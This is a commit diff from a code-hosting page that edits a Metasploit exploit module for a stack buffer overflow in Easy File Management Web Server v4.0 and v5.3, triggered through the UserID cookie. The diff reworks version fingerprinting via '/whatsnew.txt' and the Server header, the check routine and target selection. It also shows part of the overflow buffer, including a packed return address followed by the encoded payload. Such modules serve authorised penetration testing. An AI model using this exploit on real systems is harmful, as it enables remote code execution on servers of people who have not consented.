TecR0c
commit
278a53c3da
|
|
@ -12,16 +12,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Easy File Management Web Server v4.0/5.3 Stack Buffer Overflow',
|
||||
'Name' => 'Easy File Management Web Server Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
Easy File Management Web Server contains a stack buffer overflow
|
||||
condition that is triggered as user-supplied input is not properly
|
||||
validated when handling the UserID cookie. This may allow a remote
|
||||
attacker to execute arbitrary code.
|
||||
|
||||
This version exploits:
|
||||
Easy File Management Web Server v4.0
|
||||
Easy File Management Web Server v5.3
|
||||
Easy File Management Web Server v4.0 and v5.3 contains a stack buffer
|
||||
overflow condition that is triggered as user-supplied input is not
|
||||
properly validated when handling the UserID cookie. This may allow a
|
||||
remote attacker to execute arbitrary code.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
|
@ -42,9 +38,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Arch' => ARCH_X86,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'ExitFunction' => 'process'
|
||||
'EXITFUNC' => 'process'
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00\x0a\x0d;",
|
||||
|
|
@ -79,34 +74,31 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# NOTE: Version 5.3 still reports "4.0" in the "Server" header
|
||||
#
|
||||
|
||||
res = send_request_raw 'uri' => '/whatsnew.txt'
|
||||
if res and res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/
|
||||
version = nil
|
||||
res = send_request_raw({'uri' => '/whatsnew.txt'})
|
||||
if res && res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/
|
||||
version = $1
|
||||
vprint_status "#{peer} - Found version: #{version}"
|
||||
return version
|
||||
elsif res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/
|
||||
version = $1
|
||||
vprint_status "#{peer} - Based on Server header: #{version}"
|
||||
return version
|
||||
else
|
||||
fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target")
|
||||
end
|
||||
|
||||
version
|
||||
end
|
||||
|
||||
def check
|
||||
|
||||
code = Exploit::CheckCode::Safe
|
||||
version = get_version
|
||||
unless version
|
||||
vprint_status "#{peer} - No response to request"
|
||||
return Exploit::CheckCode::Unknown
|
||||
if version.nil?
|
||||
code = Exploit::CheckCode::Unknown
|
||||
elsif version == "5.3"
|
||||
code = Exploit::CheckCode::Appears
|
||||
elsif version == "4.0"
|
||||
code = Exploit::CheckCode::Appears
|
||||
end
|
||||
if version == "5.3"
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
if version == "4.0"
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
Exploit::CheckCode::Safe
|
||||
|
||||
code
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
|
@ -115,23 +107,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Get target version to determine how to reach call/jmp esp
|
||||
#
|
||||
|
||||
print_status("#{peer} - Fingerprinting version...")
|
||||
version = get_version
|
||||
|
||||
if target.name =~ /Automatic/
|
||||
version = get_version
|
||||
if version =~ /5\.3/
|
||||
if version.nil?
|
||||
fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target")
|
||||
elsif version =~ /5\.3/
|
||||
my_target = targets[1]
|
||||
else version =~ /4\.0/
|
||||
elsif version =~ /4\.0/
|
||||
my_target = targets[2]
|
||||
end
|
||||
print_good("#{peer} - Version #{version} found")
|
||||
else
|
||||
my_target = target
|
||||
end
|
||||
|
||||
#
|
||||
# Check if target appears to be vulnerable, if not exit
|
||||
#
|
||||
|
||||
unless check == Exploit::CheckCode::Appears || check == Exploit::CheckCode::Detected
|
||||
fail_with(Failure::NoTarget, "#{peer} - Target does not appear to be running fmws v4.0/5.3")
|
||||
unless version && my_target.name.include?(version)
|
||||
print_error("#{peer} - The selected target doesn't match the detected version, trying anyway...")
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
|
|
@ -150,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sploit << [0x1002466D].pack("V") # Push eax > retn
|
||||
sploit << payload.encoded
|
||||
|
||||
print_status "#{peer} - Trying target #{target.name}..."
|
||||
print_status "#{peer} - Trying target #{my_target.name}..."
|
||||
|
||||
#
|
||||
# NOTE: Successful HTTP request is required to trigger
|
||||
|
|
|
|||
Loading…
Reference in New Issue